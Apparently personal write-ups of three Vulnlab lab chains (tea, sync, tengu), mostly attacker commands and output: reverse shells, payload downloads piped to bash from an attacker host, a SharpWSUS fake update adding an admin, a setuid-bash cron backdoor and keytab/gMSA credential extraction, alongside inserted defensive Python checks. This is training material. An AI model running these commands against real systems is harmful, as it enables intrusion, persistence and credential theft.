vulnlab-tea


A medium-rated AD chain. srv.tea.vl runs a Gitea instance with an active runner; by registering a user and enabling Actions on our repository we can execute commands on the runner and get a reverse shell. From there: Get-LapsADPassword -> SharpWSUS.exe -> domain admin on dc.tea.vl.


Gitea build

Create a .gitea/workflows/demo.yaml file in the repository we created:

http://srv.tea.vl:3000/puck/puck/src/branch/main/.gitea/workflows/demo.yaml

name: Build
run-name: ${{ gitea.actor }} running build job
on: [push]

jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest
    steps:
      - run: echo "🍏 This job's status is ${{ job.status }}."
      - run: powershell -e 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
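As an added example (not part of the write-up), a small reviewer check over workflow files that flags `run:` steps like the one above: encoded PowerShell, downloads from a URL and in-memory execution. The sample workflow is constructed, with a harmless base64 string in place of the real payload and 203.0.113.10 as a placeholder host; on the Gitea side the matching hardening is `[service] DISABLE_REGISTRATION = true` in app.ini and enabling Actions only on repositories you trust.

```python
import re

# Constructed sample workflow for the check below. It mirrors the shape of the
# demo.yaml above, but the real base64 payload is replaced by a harmless string
# and the download host is a documentation placeholder address.
SAMPLE_WORKFLOW = """\
name: Build
run-name: ${{ gitea.actor }} running build job
on: [push]

jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest
    steps:
      - run: echo "This job's status is ${{ job.status }}."
      - run: powershell -e ZWNobyBoZWxsbw==
      - run: powershell -c "iwr http://203.0.113.10:8000/beacon.exe -o beacon.exe; ./beacon.exe"
"""

# Patterns a reviewer applies to every `run:` step before a self-hosted runner
# is allowed to execute it. Each rule is (name, compiled regex).
RULES = [
    # powershell -e / -enc / -EncodedCommand followed by a base64 blob
    ("encoded-powershell",
     re.compile(r"powershell(?:\.exe)?\s+(?:-\S+\s+)*-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}",
                re.I)),
    # the step fetches something from a URL
    ("download-from-url",
     re.compile(r"\b(?:iwr|invoke-webrequest|curl|wget|certutil|downloadstring|downloadfile)\b.*https?://",
                re.I)),
    # in-memory execution of fetched text
    ("in-memory-exec", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
]


def run_steps(workflow_text):
    """Yield (line_number, command) for every `- run:` step in the YAML text."""
    for lineno, line in enumerate(workflow_text.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("- run:"):
            yield lineno, stripped[len("- run:"):].strip()


def risky_steps(workflow_text):
    """Return [(line_number, rule_name)] for every step matching a rule."""
    findings = []
    for lineno, command in run_steps(workflow_text):
        for name, pattern in RULES:
            if pattern.search(command):
                findings.append((lineno, name))
    return findings


if __name__ == "__main__":
    for lineno, name in risky_steps(SAMPLE_WORKFLOW):
        print(f"line {lineno}: {name}")
```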

Catch the shell with netcat:

┌──(puck㉿kali)-[~/vulnlab/tea]
└─$ rlwrap nc -nlvp 443                         
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.191.134] 50061

PS C:\Users\thomas.wallace\.cache\act\63805091085fb29f\hostexecutor> whoami
tea\thomas.wallace

Download and execute the beacon:

PS C:\_install> iwr http://10.8.2.138:8000/beacon.exe -o beacon.exe
PS C:\_install> ./beacon.exe

Sliver

┌──(puck㉿kali)-[~/vulnlab/tea]
└─$ sliver                    
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

    ███████╗██╗     ██╗██╗   ██╗███████╗██████╗
    ██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗
    ███████╗██║     ██║██║   ██║█████╗  ██████╔╝
    ╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗
    ███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║
    ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝

All hackers gain vigilance
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > https --lport 8443

[*] Starting HTTPS :8443 listener ...

[*] Successfully started job #1

   
sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 


sliver > generate beacon --seconds 5 --jitter 3 --os windows --arch amd64 --format EXECUTABLE --http 10.8.2.138:8443 --name tea-3 --save /tmp/beacon.exe -G --skip-symbols

[*] Generating new windows/amd64 beacon implant binary (5s)
[!] Symbol obfuscation is disabled
[*] Build completed in 2s
[*] Implant saved to /tmp/beacon.exe

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

[*] Beacon 9d553a10 tea-3 - 10.10.191.134:50348 (SRV) - windows/amd64 - Tue, 20 Aug 2024 10:25:18 CEST

sliver > use 9d553a10

[*] Active beacon tea-3 (9d553a10-504e-4b41-927f-34a21b1a94bc)

sliver (tea-3) > ls

[*] Tasked beacon tea-3 (2cdcbb9d)

[+] tea-3 completed task 2cdcbb9d

C:\_install (6 items, 24.0 MiB)
===============================
-rw-rw-rw-  beacon.exe                 10.5 MiB   Tue Aug 20 01:16:47 -0700 2024
-rw-rw-rw-  beacon2.exe                10.5 MiB   Tue Aug 20 01:24:56 -0700 2024
-rw-rw-rw-  LAPS.x64.msi               1.1 MiB    Sun Dec 24 06:37:30 -0700 2023
-rw-rw-rw-  LAPS_OperationsGuide.docx  626.3 KiB  Sun Dec 24 06:37:39 -0700 2023
-rw-rw-rw-  PsExec64.exe               813.9 KiB  Sun Oct 22 06:03:38 -0700 2023
-rw-rw-rw-  PsInfo64.exe               523.4 KiB  Sun Dec 24 06:38:30 -0700 2023



sliver (tea-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup

[*] Tasked beacon tea-3 (6338fcbb)

[+] tea-3 completed task 6338fcbb

[*] sharp-hound-4 output:
2024-08-20T01:27:54.2810142-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-08-20T01:27:54.9376664-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
--snip--
2024-08-20T01:28:41.7584223-07:00|INFORMATION|Status: 309 objects finished (+309 6.866667)/s -- Using 69 MB RAM
2024-08-20T01:28:41.7687327-07:00|INFORMATION|Enumeration finished in 00:00:45.8844244
2024-08-20T01:28:41.8847345-07:00|INFORMATION|Saving cache with stats: 250 ID to type mappings.
 254 name to SID mappings.
 2 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-08-20T01:28:41.9476974-07:00|INFORMATION|SharpHound Enumeration Completed at 1:28 AM on 8/20/2024! Happy Graphing!

[*] Output saved to /tmp/sharp-hound-4_.3130027413.log

sliver (tea-3) > ls

[*] Tasked beacon tea-3 (3f00e892)

[+] tea-3 completed task 3f00e892

C:\_install (8 items, 24.0 MiB)
===============================
-rw-rw-rw-  20240820012840_BloodHound.zip                         23.2 KiB   Tue Aug 20 01:28:41 -0700 2024
-rw-rw-rw-  beacon.exe                                            10.5 MiB   Tue Aug 20 01:16:47 -0700 2024
-rw-rw-rw-  beacon2.exe                                           10.5 MiB   Tue Aug 20 01:24:56 -0700 2024
-rw-rw-rw-  LAPS.x64.msi                                          1.1 MiB    Sun Dec 24 06:37:30 -0700 2023
-rw-rw-rw-  LAPS_OperationsGuide.docx                             626.3 KiB  Sun Dec 24 06:37:39 -0700 2023
-rw-rw-rw-  NjdkNDliNTgtOWQ5Mi00ZTViLWI2NzctOWJlODE4OTM4ZGMy.bin  42.8 KiB   Tue Aug 20 01:28:41 -0700 2024
-rw-rw-rw-  PsExec64.exe                                          813.9 KiB  Sun Oct 22 06:03:38 -0700 2023
-rw-rw-rw-  PsInfo64.exe                                          523.4 KiB  Sun Dec 24 06:38:30 -0700 2023


sliver (tea-3) > download 20240820012840_BloodHound.zip

[*] Tasked beacon tea-3 (d8c023fe)

[+] tea-3 completed task d8c023fe

[*] Wrote 23731 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/tea/20240820012840_BloodHound.zip

sliver (tea-3) >  

                                                                                                                     

sliver (tea-3) > interactive

[*] Using beacon's active C2 endpoint: https://10.8.2.138:8443
[*] Tasked beacon tea-3 (d48d0ac7)

[*] Session 67a7541b tea-3 - 10.10.163.246:53086 (SRV) - windows/amd64 - Thu, 22 Aug 2024 09:21:51 CEST

sliver (tea-3) > use 67a7541b-db54-4c92-a36a-b6baec828a14

[*] Active session tea-3 (67a7541b-db54-4c92-a36a-b6baec828a14)

sliver (tea-3) > shell

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...

[*] Started remote shell with pid 4600

PS C:\_install> Get-LAPSADPassword -Identity SRV -AsPlainText

Get-LAPSADPassword -Identity SRV -AsPlainText

ComputerName        : SRV
DistinguishedName   : CN=SRV,OU=Servers,DC=tea,DC=vl
Account             : Administrator
Password            : %t50Z))o4+0Z;6
PasswordUpdateTime  : 8/21/2024 11:53:03 PM
ExpirationTimestamp : 9/20/2024 11:53:03 PM
Source              : EncryptedPassword
DecryptionStatus    : Success
AuthorizedDecryptor : TEA\Server Administration

PS C:\_install> 


netexec winrm srv.tea.vl -u administrator -p 'rr<redacted>S9' --local
WINRM       10.10.191.134   5985   SRV              [*] Windows Server 2022 Build 20348 (name:SRV) (domain:tea.vl)
WINRM       10.10.191.134   5985   SRV              [+] SRV\administrator:rr<redacted>S9 (Pwn3d!)


evil-winrm -i srv.tea.vl -u administrator -p 'rr<redacted>S9'

or

xfreerdp /u:Administrator /p:rr<redacted>S9 /w:1566 /h:968 /v:srv.tea.vl:3389

Not finished yet; fetch SharpWSUS next:

iwr http://10.8.2.138:8000/SharpWSUS.exe -o sharpwsus.exe


SharpWSUS

sharpwsus locate

sharpwsus inspect

sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21" /date:2024-08-23 /kb:700123 /rating:Important /description:"Really important update" /url:"https://google.com"

sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"

sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl

sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"


C:\_install>sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
C:\WSUS-Updates\WsusContent
[*] Creating patch to use the following:
[*] Payload: psexec64.exe
[*] Payload Path: C:\Users\Administrator\Documents\psexec64.exe
[*] Arguments: -accepteula -s -d cmd.exe /c \net
[*] Arguments (HTML Encoded): -accepteula -s -d cmd.exe /c \net

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
SRV, 8530, C:\WSUS-Updates\WsusContent

ImportUpdate
Update Revision ID: 198781
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 198782
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN

[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete

There is no such global user or group: puck.

There is no such global user or group: " /title:Great.

There is no such global user or group: UpdateC21.

More help is available by typing NET HELPMSG 3783.



C:\_install>SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:dc.tea.vl /groupname:"Group1"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update
C:\WSUS-Updates\WsusContent

Targeting dc.tea.vl
TargetComputer, ComputerID, TargetID
------------------------------------
dc.tea.vl, 216d99cd-2257-41e7-9687-2163fb7e39f7, 1
Group Exists = False
Group Created: Group1
Added Computer To Group
Approved Update

[*] Approve complete


C:\_install>

 


┌──(puck㉿kali)-[~/vulnlab]
└─$ netexec smb dc.tea.vl -u puckie -p 'Start123!'
SMB         10.10.145.21    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB         10.10.145.21    445    DC               [+] tea.vl\puckie:Start123! (Pwn3d!)


Finally:

xfreerdp /u:puckie /p:'Start123!' /w:1566 /h:968 /v:dc.tea.vl:3389


Dump the hashes:

impacket-secretsdump 'tea/puckie:Start123!@dc.tea.vl' > allhashes.txt

 

This was super fun.


 

vulnlab-sync


An easy Linux box.

Nmap scan:

# Nmap 7.93 scan initiated Mon Aug 19 11:03:10 2024 as: nmap -A -oN sync.nmap 10.10.93.172
Nmap scan report for 10.10.93.172
Host is up (0.023s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.5
22/tcp  open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4b1533cc6cce0953f8f37d3b082785fa (ECDSA)
|_  256 18fd36c6a505b196147283f862d53821 (ED25519)
80/tcp  open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Login
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.52 (Ubuntu)
873/tcp open  rsync   (protocol version 31)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 19 11:03:18 2024 -- 1 IP address (1 host up) scanned in 8.51 seconds

rsync enumeration:

rsync -av --list-only rsync://10.10.93.172/

Use rsync to pull the website's source files:

rsync -av rsync://10.10.93.172:873/httpd ./rsyn_shared


We find that the stored hash is computed over three fields, $secure|$username|$password, where the $secure value acts as the salt:

a0de4d7f81676c3ea9eabcadfd2536f6:6c4972f3717a5e881e282ad3105de01e|triss|

hashcat can crack it:

hashcat -a 0 -m 20 hash.txt /usr/share/wordlists/rockyou.txt -o crackedtriss.txt
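To make the scheme concrete, an added example (not from the write-up) that parses the dumped `digest:secure|username|` line, reproduces the legacy md5 computation the site uses, and shows the scrypt-based replacement a maintainer would use instead. The `scrypt$salt$key` storage format is an assumption of this example.

```python
import hashlib
import hmac
import os


def parse_stored_line(line):
    """Split a 'digest:secure|username|' line as dumped from the site's database.

    Returns (digest, secure, username). The trailing '|' is where the cleartext
    password was appended before hashing, which is why hashcat mode 20
    (md5($salt.$pass)) fits: the salt is the whole 'secure|username|' prefix.
    """
    digest, salt = line.strip().split(":", 1)
    secure, username, rest = salt.split("|")
    if rest:
        raise ValueError("unexpected data after the username field")
    return digest, secure, username


def legacy_hash(secure, username, password):
    """The site's scheme as described above: md5('$secure|$username|$password')."""
    return hashlib.md5(f"{secure}|{username}|{password}".encode()).hexdigest()


def legacy_verify(stored_line, password):
    """How the vulnerable login check works: fast, unsalted-per-user md5."""
    digest, secure, username = parse_stored_line(stored_line)
    return hmac.compare_digest(digest, legacy_hash(secure, username, password))


# Replacement scheme (assumption: the app can store one opaque string per user).
SCRYPT_PARAMS = dict(n=2**14, r=8, p=1, dklen=32)


def hardened_hash(password, salt=None):
    """scrypt with a random 16-byte salt, stored as 'scrypt$<salt>$<key>' in hex."""
    salt = os.urandom(16) if salt is None else salt
    key = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return f"scrypt${salt.hex()}${key.hex()}"


def hardened_verify(stored, password):
    """Constant-time check against a 'scrypt$salt$key' record."""
    scheme, salt_hex, key_hex = stored.split("$")
    if scheme != "scrypt":
        return False
    key = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), **SCRYPT_PARAMS)
    return hmac.compare_digest(key.hex(), key_hex)
```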

We can now FTP to the box as triss, create a .ssh folder and upload our public key (id_rsa.pub) there as authorized_keys:

┌──(puck㉿kali)-[~/vulnlab/sync]
└─$ ftp 10.10.93.172      
Connected to 10.10.93.172.
220 (vsFTPd 3.0.5)
Name (10.10.93.172:puck): triss
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||41121|)
150 Here comes the directory listing.
drwxr-x---    2 1003     1003         4096 Apr 21  2023 .
drwxr-x---    2 1003     1003         4096 Apr 21  2023 ..
lrwxrwxrwx    1 0        0               9 Apr 21  2023 .bash_history -> /dev/null
-rw-r--r--    1 1003     1003          220 Apr 19  2023 .bash_logout
-rw-r--r--    1 1003     1003         3771 Apr 19  2023 .bashrc
-rw-r--r--    1 1003     1003          807 Apr 19  2023 .profile
226 Directory send OK.
ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||6569|)
150 Ok to send data.
100% |************************************************************************|    91      612.87 KiB/s    00:00 ETA
226 Transfer complete.
91 bytes sent in 00:00 (2.32 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||65353|)
150 Here comes the directory listing.
-rw-------    1 1003     1003           91 Aug 19 09:11 authorized_keys
226 Directory send OK.


ssh -i ed_25519 triss@10.10.93.172

We find another user, jennifer, in /etc/passwd; su jennifer works with the same password as triss.

There is a zip file in /backup, a backup owned by root.

timeout 60s ./pspy64

Get the zip:

wget http://10.8.2.138:8000/1698154321.zip

Unshadow:

$ unshadow passwd shadow > unshadow

Crack it:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadow

The user sa has write permission on this shell script, so we append a line to it:

echo "chmod +s /bin/bash" >> /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh
#!/bin/bash

mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
chmod +s /bin/bash

Wait a minute, then:

/bin/bash -p
bash-5.1# id
uid=1001(sa) gid=1001(sa) euid=0(root) egid=0(root) groups=0(root),1001(sa)
bash-5.1#

That's all.

 

 

vulnlab-tengu


A medium chain with an Ubuntu VM, sql.tengu.vl and dc.tengu.vl (all domain-joined).

noderedsh.py -> extract krb5.keytab -> read gMSA password -> delegate -> log in with mssqlclient.py while impersonating -> read the domain admin password with SharpDPAPI

Node-RED exploit [initial access]

A web service named Node-RED runs on port 1880 and does not require authentication. We create a flow that executes a reverse shell on the target system:

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ python3 noderedsh.py http://10.10.139.247:1880
[+] Node-RED does not require authentication.
[+] Establishing RCE link ....
> whoami
nodered_svc
curl http://10.8.2.138/s.sh | bash


python3 -m http.server 80          
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.139.247 - - [09/Aug/2024 14:21:42] "GET /s.sh HTTP/1.1" 200 -


┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ nc -nlvp 9001       
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.139.247] 48442
sh: 0: can't access tty; job control turned off
$ whoami
nodered_svc
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
nodered_svc@nodered:/opt/nodered/.node-red$ export TERM=xterm
export TERM=xterm
nodered_svc@nodered:/opt/nodered/.node-red$ 
zsh: suspended  rlwrap nc -nlvp 443


┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 443
nodered_svc@nodered:/opt/nodered/.node-red$ 
nodered_svc@nodered:/tmp$ wget http://10.8.2.138/chisel
nodered_svc@nodered:/tmp$ chmod +x chisel
nodered_svc@nodered:/tmp$ ./chisel client 10.8.2.138:8000 R:socks


┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ chisel server -p 8000 --reverse 
2024/08/14 09:18:49 server: Reverse tunnelling enabled
2024/08/14 09:18:49 server: Fingerprint DGcMxm0MtWpKPEJ5EPKN8UyvmAiowDGpTHgWZHQCdOc=
2024/08/14 09:18:49 server: Listening on http://0.0.0.0:8000
2024/08/14 09:20:49 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening


┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains crackmapexec mssql sql.tengu.vl -u nodered_connector -p 'DreamPuppy<redacted25>' --local-auth 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  sql.tengu.vl:1433  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  sql.tengu.vl:445  ...  OK
MSSQL       sql.tengu.vl    1433   SQL              [*] Windows Server 2022 Build 20348 (name:SQL) (domain:SQL)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  sql.tengu.vl:1433  ...  OK
MSSQL       sql.tengu.vl    1433   SQL              [+] nodered_connector:DreamPuppy<redacted>25 


┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 sqsh -S 10.10.139.246 -U 'nodered_connector' -P 'DreamPuppy<redacted>25'  
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.139.246:1433  ...  OK
1> show databases;
2> use prod;
3> go
Msg 911, Level 16, State 1
Server 'SQL', Line 2
Database 'prod' does not exist. Make sure that the name is entered correctly.
1> select table_name from systable
2> go
Msg 208, Level 16, State 1
Server 'SQL', Line 1
Invalid object name 'systable'.
1> SELECT * FROM Dev.INFORMATION_SCHEMA.TABLES;
2> go -m vert
TABLE_CATALOG: Dev
TABLE_SCHEMA:  dbo
TABLE_NAME:    Task
TABLE_TYPE:    BASE TABLE
 
(1 row affected)
1> 

...
1> SELECT name FROM master.dbo.sysdatabases;
2> go -m vert
name: master
 
name: tempdb
 
name: model
 
name: msdb
 
name: Demo
 
name: Dev
 
(6 rows affected)
1> use Demo;
2> go
1> select * from users;
2> go -m vert
ID:       NULL
Username: t2_m.winters
Password: af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147
 
(1 row affected)
1> 


crackstation.net resolves this hash to Tengu123.

Checking credentials

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q crackmapexec ldap dc.tengu.nl -u 't2_m.winters' -p 'Tengu123'         
SMB         dc.tengu.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  DC.tengu.vl:389  ...  OK
LDAP        dc.tengu.nl     389    DC               [+] tengu.vl\t2_m.winters:Tengu123 

 

Getting krb5.keytab

As this box is domain-joined, we can extract the machine account's NTLM hash from /etc/krb5.keytab using https://github.com/sosdave/KeyTabExtract:

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
    REALM : TENGU.VL
    SERVICE PRINCIPAL : NODERED$/
    NTLM HASH : d4210ee2db0c03aa3611c9ef8a4dbf49
    AES-256 HASH : 4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096
    AES-128 HASH : 3e04b61b939f61018d2c27d4dc0b385f
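An added example (not the KeyTabExtract tool) that parses the MIT keytab format and reports, per entry, the principal, encryption type and kvno without exposing key material, so an admin can audit which hosts still keep an RC4-HMAC key (which is the NT hash) and whether the file mode exposes the keytab at all. The keytab it parses is constructed in-code with zeroed keys; the NODERED$ principal and TENGU.VL realm from the output above are used only as labels.

```python
import os
import struct

RC4_HMAC, AES128_SHA1, AES256_SHA1 = 23, 17, 18
ENCTYPE_NAMES = {RC4_HMAC: "rc4-hmac", AES128_SHA1: "aes128-cts-hmac-sha1-96",
                 AES256_SHA1: "aes256-cts-hmac-sha1-96"}


def _octets(data):
    """counted_octet_string: 16-bit big-endian length followed by the bytes."""
    return struct.pack(">H", len(data)) + data


def build_keytab(realm, components, keys, kvno=2, timestamp=0):
    """Serialise MIT keytab v0x0502 entries, one per (enctype, key) pair.

    Used here only to construct test input; real keytabs come from the KDC.
    """
    blob = b"\x05\x02"
    for enctype, key in keys:
        body = struct.pack(">H", len(components)) + _octets(realm.encode())
        for comp in components:
            body += _octets(comp.encode())
        body += struct.pack(">IIB", 1, timestamp, kvno & 0xFF)   # name_type, time, vno8
        body += struct.pack(">H", enctype) + _octets(key)
        body += struct.pack(">I", kvno)                            # optional 32-bit vno
        blob += struct.pack(">i", len(body)) + body
    return blob


def parse_keytab(blob):
    """Return one dict per entry: principal, enctype, kvno and key length (never the key)."""
    if blob[:2] != b"\x05\x02":
        raise ValueError("only keytab format version 0x0502 is handled")
    pos, entries = 2, []

    def octets():
        nonlocal pos
        (n,) = struct.unpack_from(">H", blob, pos)
        pos += 2
        value = blob[pos:pos + n]
        pos += n
        return value

    while pos + 4 <= len(blob):
        (size,) = struct.unpack_from(">i", blob, pos)
        pos += 4
        if size < 0:                      # negative size marks a deleted slot
            pos += -size
            continue
        end = pos + size
        (ncomp,) = struct.unpack_from(">H", blob, pos)
        pos += 2
        realm = octets().decode()
        comps = [octets().decode() for _ in range(ncomp)]
        _name_type, _timestamp, vno8 = struct.unpack_from(">IIB", blob, pos)
        pos += 9
        (enctype,) = struct.unpack_from(">H", blob, pos)
        pos += 2
        key = octets()
        kvno = vno8
        if end - pos >= 4:                # 32-bit vno is present when room remains
            (kvno,) = struct.unpack_from(">I", blob, pos)
        pos = end
        entries.append({"principal": "/".join(comps) + "@" + realm,
                        "enctype": enctype,
                        "enctype_name": ENCTYPE_NAMES.get(enctype, str(enctype)),
                        "kvno": kvno, "key_len": len(key)})
    return entries


def rc4_principals(entries):
    """Principals whose keytab still holds an RC4-HMAC key (the NT hash itself)."""
    return sorted({e["principal"] for e in entries if e["enctype"] == RC4_HMAC})


def keytab_mode_exposed(mode):
    """True if group or world bits are set; /etc/krb5.keytab should be 0600 root."""
    return bool(mode & 0o077)


def keytab_readable_by_others(path):
    return keytab_mode_exposed(os.stat(path).st_mode)
```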

 


 

proxychains4 bloodhound-python -d tengu.vl -c all -u t2_m.winters -p Tengu123 -ns 10.10.219.229 --dns-tcp --zip

In BloodHound we find that the machine account NODERED$ has the ReadGMSAPassword permission.

We can use netexec to retrieve the NTLM hash of the account gMSA01$:

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 netexec ldap dc.tengu.vl -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:636  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
SMB         224.0.0.1       445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:636  ...  OK
LDAPS       224.0.0.1       636    DC               [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49 
